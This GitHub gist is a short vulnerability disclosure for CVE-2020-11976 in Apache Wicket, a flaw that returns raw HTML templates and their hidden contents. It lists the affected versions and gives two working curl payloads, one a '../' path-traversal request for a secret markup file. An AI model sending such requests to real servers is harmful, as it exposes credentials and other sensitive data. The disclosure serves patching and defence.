Skip to content

Instantly share code, notes, and snippets.

@mariuszpoplawski
Last active June 2, 2021 16:52
Show Gist options
  • Save mariuszpoplawski/abfc6da5ee84c8a722d06ba18c52e20c to your computer and use it in GitHub Desktop.
Save mariuszpoplawski/abfc6da5ee84c8a722d06ba18c52e20c to your computer and use it in GitHub Desktop.
CVE-2020-11976 - Apache wicket LFI / markup source file read vulnerability
------------------------------------------
By crafting a special URL it is possible to make Wicket deliver unprocessed HTML templates.
This would allow an attacker to see possibly sensitive information inside a HTML template that is usually removed during rendering.
Affected are Apache Wicket versions 7.16.0, 8.8.0 and 9.0.0-M5
For example if there are credentials in the markup which are never supposed to be visible to the client:
<wicket:remove>
some secret
</wicket:remove>
Payload:
$ curl --path-as-is
http://127.0.0.1:8088/prototype/wicket/resource/org.apache.wicket.examples.WicketExamplePage/./WicketExamplePage.html
$ curl --insecure --path-as-is https://192.168.1.11:8443/wicket/resource/org.apache.wicket.Application/../../../SecretMarkupFile.html
MISC:https://lists.apache.org/thread.html/r104eeefeb1e9da51f7ef79cef0f9ff12e21ef8559b77801e86b21e16%40%3Cusers.wicket.apache.org%3E
URL:https://lists.apache.org/thread.html/r104eeefeb1e9da51f7ef79cef0f9ff12e21ef8559b77801e86b21e16%40%3Cusers.wicket.apache.org%3E
Mariusz Popłwski / AFINE.com team
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment